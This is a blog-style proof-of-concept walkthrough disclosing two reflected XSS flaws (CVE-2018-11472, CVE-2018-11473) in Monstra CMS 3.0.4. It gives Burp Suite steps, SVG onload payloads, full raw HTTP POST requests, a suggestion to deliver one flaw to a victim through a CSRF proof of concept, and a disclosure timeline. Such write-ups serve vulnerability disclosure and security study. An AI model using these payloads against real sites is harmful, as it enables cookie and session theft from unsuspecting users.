Proof Of Concept-Walktrough for CVE-2018-11472 and CVE-2018-11473

 

This article is about the XSS vulnerabilities that I had found out on Monstra CMS 3.0.4.

The bugs had medium impact and were quite easy to find and reproduce as well.

Now coming to XSS,

According to internet, Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

In the upcoming days I’ll make a detailed explanation on XSS which will be put on in the articles tab.

CVE-2018-11472

 

Vulnerability Type : Cross Site Scripting (XSS)

Vendor of Product : Monstra CMS 3.0.4

Affected Component : http://localhost/monstra/admin/index.php?id=pages

Attack Type : Remote

Attack Vectors:

Steps:

1)go to the following link http://localhost/monstra/admin/index.php?id=pages
2)enter your username and password
3)capture the post request in burpsuite
4)In the body of the post request there would be a field “login=” .Set this field to the following payload:- “><svg/onload=prompt(8)>
5)Forward the request and turn off the intercept in burpsuite
6)You will get a pop up in browser

 

POST REQUEST:-

POST /monstra/admin/index.php?id=pages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra/admin/index.php?id=pages
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

login=”><svg/onload=prompt(1337)>&password=xxxxxx&login_submit=Log+In

 

Screenshots:

Screenshot (258)

 

CVE-2018-11473

 

Vulnerability Type : Cross Site Scripting (XSS)

Vendor of Product : Monstra CMS 3.0.4

Affected Component : http://localhost/monstra/users/registration

Attack Type : Remote

Attack Vectors:

Steps:

1)While registering..enter your details
2)turn up the intercept in burp
3)Capture the request and change any field(endpoint) in post request body to a malicious code:-  “><svg/onload=alert(1337)>
4)Make a csrf poc of that send it to the victim
5)The malicious script will executed on the victim’s end

 

POST REQUEST:-

POST /monstra/users/registration HTTP/1.1
Host: localhost
Cache-Control: no-cache
Referer: http://localhost/monstra/users/registration
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B
Accept-Encoding: gzip, deflate
Content-Length: 142
Content-Type: application/x-www-form-urlencoded

csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&login=”><svg/onload=prompt(1)>&password=&email=&answer=&register=Register

External Links:

CVE-2018-11472

https://github.com/nikhil1232/Monstra-CMS-3.0.4-Reflected-XSS-On-Login-

CVE-2018-11473

https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page

Timeline:

23/05/18 :- Tried to contact Monstra CMS,but got no reply

25/05/18 :- Went to cve mitre and requested for a CVE ID.

25/05/18 :- Cve request Ids were generated and was asked for a public disclosure of the POC

26/05/18 :- Provided the public disclosure(my github repos where I had made poc of the bugs)

27/05/18 :- CVE ID and Issue was made public by cve mitre.

So that’s for now. See you next time.Goodbye

Loved what you read?

If so, then kindly follow and share our website for much more interesting stuffs ?

For any queries please send a Hi to my Linkedin Handle: Here

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *